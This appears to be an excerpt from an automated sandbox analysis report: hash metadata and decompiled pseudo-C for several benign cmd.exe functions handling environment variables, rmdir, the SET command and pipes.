                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$_wcslwr
                                    • String ID: [%s]
                                    • API String ID: 886762496-302437576
                                    • Opcode ID: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction ID: c09e236cb5b70b2300a053064a6c06793fd04e8c558ed09549297d71da787e97
                                    • Opcode Fuzzy Hash: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction Fuzzy Hash: 32217571B002195BDB19DAE4E989BBEBBE8AF58314F4804ADE609D3141EB74DE44CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmp
                                    • String ID: /-Y$COPYCMD
                                    • API String ID: 1886669725-617350906
                                    • Opcode ID: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction ID: 0c03cfd9843b9412f30f3c6e4ef8bd79977d8261c01111121fc3b547cca2b04f
                                    • Opcode Fuzzy Hash: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction Fuzzy Hash: 9F219B72A08A1297DB2C9B9E984D6BAFAF6EFA5250F950069FC4D97241EF308D41C250
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • iswspace.MSVCRT ref: 011E23C8
                                    • _wcsnicmp.MSVCRT ref: 011E2419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswspace$_wcsnicmp
                                    • String ID: off
                                    • API String ID: 3989682491-733764931
                                    • Opcode ID: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction ID: e69aba4d19a21cf1db1f221edfc95bb234fc90446da2207306f5561b6a4fc8fa
                                    • Opcode Fuzzy Hash: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction Fuzzy Hash: F2114C22704E1256FF3E12EE7C7EF3A55EC9F95959B19002AFD46E60C1EF7089808162
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E011F4506(intOrPtr* __ecx) {
                                    				void* _t5;
                                    				signed int _t6;
                                    				signed int _t8;
                                    				signed int _t9;
                                    				void* _t19;
                                    				signed int _t23;
                                    				intOrPtr* _t26;
                                    				signed int _t27;
                                    				signed int _t28;
                                    				signed int _t30;
                                    
                                    				_t23 = __ecx;
                                    				if(__ecx != 0) {
                                    					_t26 = __ecx;
                                    					__eflags = 0;
                                    					_t19 = __ecx + 2;
                                    					do {
                                    						_t6 =  *_t26;
                                    						_t26 = _t26 + 2;
                                    						__eflags = _t6;
                                    					} while (_t6 != 0);
                                    					while(1) {
                                    						_t27 = _t26 - _t19;
                                    						__eflags = _t27;
                                    						_t28 = _t27 >> 1;
                                    						if(_t27 == 0) {
                                    							break;
                                    						}
                                    						__eflags =  *0x11fd544; // 0x0
                                    						if(__eflags != 0) {
                                    							_t8 = 1;
                                    						} else {
                                    							__eflags =  *_t23 - 0x3d;
                                    							if( *_t23 != 0x3d) {
                                    								_push(_t23);
                                    								E011E25D9(L"%s\r\n");
                                    							}
                                    							_t23 = _t23 + _t28 * 2 + 2;
                                    							__eflags = _t23;
                                    							_t30 = _t23;
                                    							_t19 = _t30 + 2;
                                    							do {
                                    								_t9 =  *_t30;
                                    								_t30 = _t30 + 2;
                                    								__eflags = _t9;
                                    							} while (_t9 != 0);
                                    							continue;
                                    						}
                                    						L12:
                                    						return _t8;
                                    						goto L14;
                                    					}
                                    					_t8 = 0;
                                    					__eflags = 0;
                                    					goto L12;
                                    				} else {
                                    					_push("Null environment");
                                    					fprintf(E011E7721(_t5, 2), "\nCMD Internal Error %s\n");
                                    					return 1;
                                    				}
                                    				L14:
                                    			}

                                    APIs
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F4522
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: __iob_funcfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 620453056-2781220306
                                    • Opcode ID: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction ID: 2455adb61447690e94106b46cdd9ec1ad82f53c622971da49736dc96b39d309f
                                    • Opcode Fuzzy Hash: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction Fuzzy Hash: 40019E77A442118EDB3CBB9C785D5B37354EAD0214315053FEE6693D54FB705942C141
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 24%
                                    			E011F2950(void* __ecx) {
                                    				signed int _v8;
                                    				void* __esi;
                                    				signed int _t3;
                                    				void* _t6;
                                    				struct HINSTANCE__* _t8;
                                    				void* _t10;
                                    				void* _t15;
                                    				void* _t16;
                                    				_Unknown_base(*)()* _t18;
                                    				void* _t19;
                                    				signed int _t20;
                                    
                                    				_push(__ecx);
                                    				_t3 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t3 ^ _t20;
                                    				_t18 =  *0x12180a0;
                                    				if(_t18 != 0) {
                                    					L5:
                                    					 *0x12194b4();
                                    					_t6 =  *_t18();
                                    				} else {
                                    					_t8 =  *0x11fd530; // 0x0
                                    					if(_t8 == 0) {
                                    						_t8 = GetModuleHandleW(L"ntdll.dll");
                                    						 *0x11fd530 = _t8;
                                    					}
                                    					_t18 = GetProcAddress(_t8, "RtlDllShutdownInProgress");
                                    					 *0x12180a0 = _t18;
                                    					if(_t18 != 0) {
                                    						goto L5;
                                    					} else {
                                    						_t6 = 0;
                                    					}
                                    				}
                                    				_pop(_t19);
                                    				return E011E6FD0(_t6, _t10, _v8 ^ _t20, _t15, _t16, _t19);
                                    			}

                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 011F2979
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 011F298A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: RtlDllShutdownInProgress$ntdll.dll
                                    • API String ID: 1646373207-582119455
                                    • Opcode ID: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction ID: 214ba48a93f13fbb78718f528236add32a921ae3f11247491a49c13772eb1db1
                                    • Opcode Fuzzy Hash: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction Fuzzy Hash: 1FF09031A20328DB8F39DF69B91D67A37E8FB54A98781025DEC01D7208EF719D418BD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E011D88D8(void* __ecx) {
                                    				signed int _v8;
                                    				void* _v12;
                                    				int _v20;
                                    				signed int _v24;
                                    				int _v28;
                                    				void* _v32;
                                    				void* _v36;
                                    				void _v548;
                                    				void* _v552;
                                    				void* _v556;
                                    				void* _v560;
                                    				int _v564;
                                    				int _v568;
                                    				int _v572;
                                    				char _v576;
                                    				char _v580;
                                    				int _v584;
                                    				int _v588;
                                    				void* _v592;
                                    				void* _v596;
                                    				void* _v602;
                                    				int _v606;
                                    				int _v610;
                                    				int _v614;
                                    				int _v618;
                                    				int _v622;
                                    				int _v626;
                                    				int _v630;
                                    				int _v634;
                                    				short _v636;
                                    				int _v640;
                                    				int _v644;
                                    				int _v648;
                                    				int _v652;
                                    				signed int _v656;
                                    				char _v660;
                                    				signed int _v664;
                                    				char _v668;
                                    				void* _v676;
                                    				void* _v680;
                                    				void* _v684;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t64;
                                    				intOrPtr _t79;
                                    				signed int _t82;
                                    				long _t87;
                                    				long _t91;
                                    				void* _t93;
                                    				void* _t94;
                                    				intOrPtr _t95;
                                    				intOrPtr* _t106;
                                    				signed int _t107;
                                    				void* _t116;
                                    				intOrPtr _t118;
                                    				WCHAR** _t119;
                                    				void* _t123;
                                    				signed int _t125;
                                    				signed int _t127;
                                    				signed int _t128;
                                    
                                    				_t127 = (_t125 & 0xfffffff8) - 0x29c;
                                    				_t64 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t64 ^ _t127;
                                    				_v24 = 1;
                                    				_v644 = 0;
                                    				_t93 = __ecx;
                                    				_v636 = 0;
                                    				_v660 = 0;
                                    				_v656 = 0;
                                    				_v652 = 0;
                                    				_v648 = 0;
                                    				_v640 = 0;
                                    				_v634 = 0;
                                    				_v630 = 0;
                                    				_v626 = 0;
                                    				_v622 = 0;
                                    				_v618 = 0;
                                    				_v614 = 0;
                                    				_v610 = 0;
                                    				_v606 = 0;
                                    				asm("stosd");
                                    				_v668 = 0;
                                    				_v28 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosw");
                                    				_v588 = 0;
                                    				_v584 = 0;
                                    				_v580 = 0;
                                    				_v576 = 0;
                                    				_v572 = 0;
                                    				_v568 = 0;
                                    				_v564 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_v20 = 0x104;
                                    				memset( &_v548, 0, 0x104);
                                    				_t128 = _t127 + 0xc;
                                    				if(E011E0C70( &_v548, 0x7fe9) < 0) {
                                    					L18:
                                    					_t122 = 1;
                                    				} else {
                                    					_t112 =  &_v660;
                                    					_v664 =  *0x1213cd8;
                                    					_v656 = 6;
                                    					_t122 = 0;
                                    					_v652 = 0;
                                    					_v588 = 0;
                                    					_v568 = 0;
                                    					if(E011D8AD7( &_v660) == 1) {
                                    						goto L18;
                                    					} else {
                                    						_t103 = _v24;
                                    						if(_v24 == 0) {
                                    							_t103 = _t128 + 0x88;
                                    						}
                                    						_t112 =  *((intOrPtr*)(_t128 + 0x298));
                                    						E011E36CB(_t93, _t103,  *((intOrPtr*)(_t128 + 0x298)), 0);
                                    						_t95 = _v588;
                                    						if(_t95 == 0) {
                                    							_push(0);
                                    							goto L30;
                                    						} else {
                                    							_t112 =  &_v580;
                                    							_t118 = _t95;
                                    							do {
                                    								_t106 =  *_t112;
                                    								_v668 = _t106 + 2;
                                    								do {
                                    									_t79 =  *_t106;
                                    									_t106 = _t106 + 2;
                                    								} while (_t79 != _v664);
                                    								_t107 = _t106 - _v668;
                                    								_t103 = _t107 >> 1;
                                    								if(_t107 == 0) {
                                    									_push(0);
                                    									L30:
                                    									_push(0x232a);
                                    									E011DC5A2(_t103);
                                    									goto L18;
                                    								} else {
                                    									goto L8;
                                    								}
                                    								goto L16;
                                    								L8:
                                    								_t112 =  *((intOrPtr*)(_t112 + 0xc));
                                    								_t118 = _t118 - 1;
                                    							} while (_t118 != 0);
                                    							_t119 =  &_v580;
                                    							_t82 = _v656 & 0x00000010;
                                    							_v664 = _t82;
                                    							do {
                                    								if(_t82 == 0) {
                                    									if(RemoveDirectoryW( *_t119) != 0) {
                                    										goto L13;
                                    									} else {
                                    										_t87 = GetLastError();
                                    										_t122 = _t87;
                                    										_push(0);
                                    										_push(_t87);
                                    										goto L28;
                                    									}
                                    									goto L16;
                                    								} else {
                                    									if((_v656 & 0x00002000) == 0) {
                                    										_t112 = 0x234e;
                                    										if(E011F9583( *_t119, 0x234e, 0x2328) == 1) {
                                    											goto L12;
                                    										} else {
                                    											_t122 = 1;
                                    											goto L13;
                                    										}
                                    										goto L16;
                                    									} else {
                                    										L12:
                                    										_t109 =  *_t119;
                                    										_t112 =  &_v668;
                                    										_t91 = E011D85EA( *_t119,  &_v668);
                                    										if(_t91 != 0) {
                                    											if(_t91 != 0x91 || _v668 != 0) {
                                    												_t109 = 0;
                                    												_t122 = _t91;
                                    												_push(0);
                                    												_push(_t91);
                                    												L28:
                                    												E011DC5A2(_t109);
                                    												_pop(_t109);
                                    											}
                                    										}
                                    									}
                                    								}
                                    								L13:
                                    								_t119 = _t119[3];
                                    								_t82 = _v664;
                                    								_t95 = _t95 - 1;
                                    							} while (_t95 != 0);
                                    							_t84 = _v24;
                                    							if(_v24 == 0) {
                                    								_t84 = _t128 + 0x88;
                                    							}
                                    							E011E0BFC(_t84,  *((intOrPtr*)(_t128 + 0x298)));
                                    							E011E2A06(_v668, _t119);
                                    						}
                                    					}
                                    				}
                                    				L16:
                                    				__imp__??_V@YAXPAX@Z(_v28);
                                    				_pop(_t116);
                                    				_pop(_t123);
                                    				_pop(_t94);
                                    				return E011E6FD0(_t122, _t94, _v8 ^ _t128, _t112, _t116, _t123);
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011D8991
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D8AAB
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$CurrentDirectory
                                    • String ID:
                                    • API String ID: 168429351-0
                                    • Opcode ID: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction ID: 659a171f208aa7f7ccb7f6b7326bde9e71d26b5a2e188439e0af765a3fd8b6fc
                                    • Opcode Fuzzy Hash: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction Fuzzy Hash: 4E6156B1A083029FD72CDF69D48466BBBE5BBD8314F14492EF699C3250EB709904CB87
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E011D5F75(void* __ecx) {
                                    				short* _v8;
                                    				signed int _v12;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				long _t22;
                                    				intOrPtr _t24;
                                    				short* _t28;
                                    				void* _t29;
                                    				void* _t30;
                                    				long _t32;
                                    				signed int _t34;
                                    				void* _t35;
                                    				signed int _t38;
                                    				signed int _t39;
                                    				wchar_t* _t40;
                                    				long _t41;
                                    				wchar_t* _t42;
                                    				signed int _t44;
                                    				signed int _t45;
                                    				void* _t46;
                                    				void* _t47;
                                    				wchar_t* _t51;
                                    				wchar_t* _t60;
                                    				signed int _t61;
                                    				signed int _t70;
                                    				void* _t71;
                                    				wchar_t* _t73;
                                    				void* _t75;
                                    				long* _t78;
                                    				long* _t80;
                                    				long _t81;
                                    				void* _t82;
                                    				signed short* _t84;
                                    				wchar_t* _t85;
                                    
                                    				_t84 =  *(__ecx + 0x3c);
                                    				if( *0x1213cc9 == 0) {
                                    					_t85 = E011DEA40(_t84, "=", 3);
                                    					_t83 = 0;
                                    					__eflags =  *_t85;
                                    					if( *_t85 == 0) {
                                    						L26:
                                    						return E011F4506( *0x1203834);
                                    					}
                                    					_t73 = _t85;
                                    					_v8 = 0;
                                    					_t46 = 2;
                                    					do {
                                    						_t51 = _t73;
                                    						_t6 =  &(_t51[0]); // 0x2
                                    						_v12 = _t6;
                                    						do {
                                    							_t22 =  *_t51;
                                    							_t51 = _t51 + _t46;
                                    							__eflags = _t22 - _t83;
                                    						} while (_t22 != _t83);
                                    						_t53 = _t51 - _v12 >> 1;
                                    						_t73 = _t73 + (_t51 - _v12 >> 1) * 2 + 2;
                                    						_t24 = _v8 + 1;
                                    						_v8 = _t24;
                                    						__eflags =  *_t73 - _t83;
                                    					} while ( *_t73 != _t83);
                                    					__eflags = _t24 - 3;
                                    					if(_t24 > 3) {
                                    						L40:
                                    						_push(_t83);
                                    						_push(0x232a);
                                    						E011DC5A2(_t53);
                                    						return 1;
                                    					}
                                    					_t53 = _t85;
                                    					_t28 = E011DD7E6(_t53);
                                    					_v8 = _t28;
                                    					__eflags =  *_t28 - 0x3d;
                                    					if( *_t28 != 0x3d) {
                                    						goto L40;
                                    					}
                                    					_t75 = _t53 + 2;
                                    					do {
                                    						_t29 =  *_t53;
                                    						_t53 = _t53 + _t46;
                                    						__eflags = _t29 - _t83;
                                    					} while (_t29 != _t83);
                                    					_v12 = _t53 - _t75 >> 1;
                                    					_t30 = E011E22C0(_t46, _t85);
                                    					__eflags = _v12 + 1;
                                    					E011E1040(_t85, _v12 + 1, _t30);
                                    					_t60 = _t85;
                                    					_t17 =  &(_t60[0]); // 0x2
                                    					_t78 = _t17;
                                    					do {
                                    						_t32 =  *_t60;
                                    						_t60 = _t60 + _t46;
                                    						__eflags = _t32 - _t83;
                                    					} while (_t32 != _t83);
                                    					_t61 = _t60 - _t78;
                                    					__eflags = _t61;
                                    					_t53 = _t61 >> 1;
                                    					if(_t61 == 0) {
                                    						goto L40;
                                    					}
                                    					_t80 = _v8 + 4;
                                    					L14:
                                    					return E011E3A50(_t85, _t80);
                                    				}
                                    				if(_t84 == 0) {
                                    					goto L26;
                                    				}
                                    				_t34 =  *_t84 & 0x0000ffff;
                                    				if(_t34 == 0) {
                                    					goto L26;
                                    				}
                                    				_t53 = _t34;
                                    				_t35 = 0x20;
                                    				_t47 = 2;
                                    				while(_t53 <= _t35) {
                                    					_t84 = _t84 + _t47;
                                    					_t45 =  *_t84 & 0x0000ffff;
                                    					_t53 = _t45;
                                    					_t35 = 0x20;
                                    					if(_t45 != 0) {
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				_t83 = 0;
                                    				if( *_t84 == 0) {
                                    					goto L26;
                                    				}
                                    				__imp___wcsnicmp(_t84, L"/A", _t47);
                                    				if(_t35 == 0) {
                                    					return E011D6052( &(_t84[2]));
                                    				}
                                    				__imp___wcsnicmp(_t84, L"/P", _t47);
                                    				if(_t35 == 0) {
                                    					return E011F474C(_t47,  &(_t84[2]), _t71, 0, _t84, __eflags);
                                    				}
                                    				_t38 =  *_t84 & 0x0000ffff;
                                    				if(_t38 == 0x2f) {
                                    					goto L40;
                                    				}
                                    				_t81 = 0x22;
                                    				if(_t38 == _t81) {
                                    					_t85 = _t84 + _t47;
                                    					_t39 =  *_t85 & 0x0000ffff;
                                    					__eflags = _t39;
                                    					if(_t39 == 0) {
                                    						L24:
                                    						_t40 = wcsrchr(_t85, _t81);
                                    						_pop(_t53);
                                    						__eflags = _t40;
                                    						if(_t40 != 0) {
                                    							_t53 = 0;
                                    							 *_t40 = 0;
                                    						}
                                    						goto L11;
                                    					}
                                    					_t70 = _t39;
                                    					_t82 = 0x20;
                                    					while(1) {
                                    						__eflags = _t70 - _t82;
                                    						if(_t70 > _t82) {
                                    							break;
                                    						}
                                    						_t85 = _t85 + _t47;
                                    						_t44 =  *_t85 & 0x0000ffff;
                                    						_t70 = _t44;
                                    						__eflags = _t44;
                                    						if(_t44 != 0) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					_t81 = 0x22;
                                    					goto L24;
                                    				}
                                    				L11:
                                    				_t41 = 0x3d;
                                    				if( *_t85 == _t41) {
                                    					goto L40;
                                    				}
                                    				_t42 = wcschr(_t85, _t41);
                                    				if(_t42 == 0) {
                                    					return E011F4588(_t85);
                                    				}
                                    				_t2 =  &(_t42[0]); // 0x2
                                    				_t80 = _t2;
                                    				 *_t42 = 0;
                                    				goto L14;
                                    			}


                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsnicmp$wcschr
                                    • String ID:
                                    • API String ID: 3270668897-0
                                    • Opcode ID: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction ID: e21ea13337b8509a8886dbc2996baa5dbb390130eee3705bd4618ba193e3823a
                                    • Opcode Fuzzy Hash: 6882690f09108301da322c924d95972048bff093752235bb1f516b1b17fecf5e
                                    • Instruction Fuzzy Hash: 35519E39200A119BEB2CEBACA86867F77F1EF94644B55445DE8439B2C1FB714E82C391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E011DAF70(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                    				char _v8;
                                    				intOrPtr _t39;
                                    				void** _t40;
                                    				void* _t42;
                                    				signed int _t46;
                                    				void* _t48;
                                    				void* _t50;
                                    				intOrPtr _t54;
                                    				void* _t60;
                                    				void* _t62;
                                    				void* _t65;
                                    				void* _t68;
                                    				long _t75;
                                    				void* _t78;
                                    				signed int _t83;
                                    				void* _t87;
                                    				signed int _t102;
                                    				long _t114;
                                    				void* _t116;
                                    				void* _t117;
                                    				void** _t119;
                                    
                                    				_push(__ecx);
                                    				_t39 = _a4;
                                    				_t114 =  *((intOrPtr*)(_t39 + 0x38));
                                    				_t75 =  *((intOrPtr*)(_t39 + 0x3c));
                                    				_t78 = 0x28;
                                    				_t40 = E011E00B0(_t78);
                                    				_t119 = _t40;
                                    				if(_t119 == 0) {
                                    					L27:
                                    					_t42 = 1;
                                    				} else {
                                    					__imp___pipe(_t119, 0, 0x8000);
                                    					if(_t40 != 0) {
                                    						_push(0);
                                    						_push(8);
                                    						E011DC5A2(_t78);
                                    						goto L27;
                                    					} else {
                                    						E011DB15E( *_t119);
                                    						E011DB15E(_t119[1]);
                                    						_t46 =  *0x11fd550; // 0x0
                                    						_t83 = _t46;
                                    						 *0x11fd550 = _t46 + 1;
                                    						if(_t83 != 0) {
                                    							_t48 =  *0x11fd5c0; // 0x0
                                    							 *(_t48 + 0x24) = _t119;
                                    							_t119[9] = _t119[9] & 0x00000000;
                                    							_t119[8] = _t48;
                                    						} else {
                                    							_t119[8] = _t119[8] & _t83;
                                    							 *0x11fd5c4 = _t119;
                                    						}
                                    						_t85 = 1;
                                    						 *0x11fd5c0 = _t119;
                                    						_t50 = E011DDBCE(_t119, 1);
                                    						_t119[3] = _t50;
                                    						if(_t50 == 0xffffffff) {
                                    							_t119[3] = _t119[3] | 0xffffffff;
                                    							L23:
                                    							_push(0);
                                    							L31:
                                    							E011DC5A2(_t85);
                                    							_t87 = 0x2351;
                                    							L32:
                                    							E011F9287(_t87);
                                    							__imp__longjmp(0x120b8b8, 1);
                                    							asm("int3");
                                    							_t102 = (_t87 - 0x20 >> 5) + 1;
                                    							_t54 =  *((intOrPtr*)(0x11fd5d0 + _t102 * 4));
                                    							asm("bts eax, ecx");
                                    							 *((intOrPtr*)(0x11fd5d0 + _t102 * 4)) = _t54;
                                    							return _t54;
                                    						}
                                    						_t85 = _t119[1];
                                    						if(E011DDBFC(_t119[1], 1) == 0xffffffff) {
                                    							goto L23;
                                    						}
                                    						E011DDB92(_t119[1]);
                                    						_t119[1] = _t119[1] & 0x00000000;
                                    						if( *_t114 <= 0) {
                                    							E011DE040(_t114,  &_v8);
                                    						}
                                    						_t116 = E011E0E00(1, _t114);
                                    						if( *0x11fd54c != 0) {
                                    							__imp___get_osfhandle(1);
                                    							DuplicateHandle( *0x11fd54c, 0,  *_t119, 0, 0, 0, 0);
                                    						}
                                    						_t85 = _t119[3];
                                    						if(E011DDBFC(_t119[3], 1) == 0xffffffff) {
                                    							goto L23;
                                    						}
                                    						_t87 = _t119[3];
                                    						E011DDB92(_t87);
                                    						_t119[3] = _t119[3] & 0x00000000;
                                    						if(_t116 != 0) {
                                    							goto L32;
                                    						}
                                    						_t60 =  *0x11fd54c; // 0x0
                                    						_t85 = 0;
                                    						_t119[4] = _t60;
                                    						_t119[6] =  *0x1203838;
                                    						 *0x11fd54c = _t116;
                                    						 *0x1203838 = _t116;
                                    						_t62 = E011DDBCE( *0x1203838, 0);
                                    						_t119[2] = _t62;
                                    						if(_t62 == 0xffffffff) {
                                    							_t119[2] = _t119[2] | 0xffffffff;
                                    							L30:
                                    							_push(_t116);
                                    							goto L31;
                                    						}
                                    						_t85 =  *_t119;
                                    						if(E011DDBFC( *_t119, 0) == 0xffffffff) {
                                    							goto L30;
                                    						}
                                    						E011DDB92( *_t119);
                                    						 *_t119 = _t116;
                                    						if( *_t75 <= _t116) {
                                    							E011DE040(_t75,  &_v8);
                                    						}
                                    						_t65 = E011E0E00(1, _t75);
                                    						_t85 = _t119[2];
                                    						_t117 = _t65;
                                    						if(E011DDBFC(_t119[2], 0) == 0xffffffff) {
                                    							goto L23;
                                    						}
                                    						E011DDB92(_t119[2]);
                                    						_t87 = 0;
                                    						_t119[2] = 0;
                                    						if(_t117 != 0) {
                                    							goto L32;
                                    						}
                                    						 *0x11fd550 =  *0x11fd550 - 1;
                                    						_t68 =  *0x11fd54c; // 0x0
                                    						_t119[5] = _t68;
                                    						_t119[7] =  *0x1203838;
                                    						 *0x11fd54c = 0;
                                    						 *0x1203838 = 0;
                                    						if( *0x11fd550 != 0) {
                                    							_t42 = 0;
                                    						} else {
                                    							_t42 = E011DB183();
                                    						}
                                    					}
                                    				}
                                    				return _t42;
                                    			}


                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _pipe.MSVCRT ref: 011DAF9F
                                      • Part of subcall function 011DDBCE: _dup.MSVCRT ref: 011DDBD5
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011F12F1
                                      • Part of subcall function 011DDBFC: _dup2.MSVCRT ref: 011DDC10
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011DB047
                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011DB055
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                    • String ID:
                                    • API String ID: 1441200171-0
                                    • Opcode ID: 6cad21d06427e9c0ae52906e1e5b7ca901d78b711cd73aa69c338ffce1a03d55
                                    • Instruction ID: 4adc1ec5e026a01e762791da8a3d31ae191c7c722cd5859a0596a3743e8a29b3
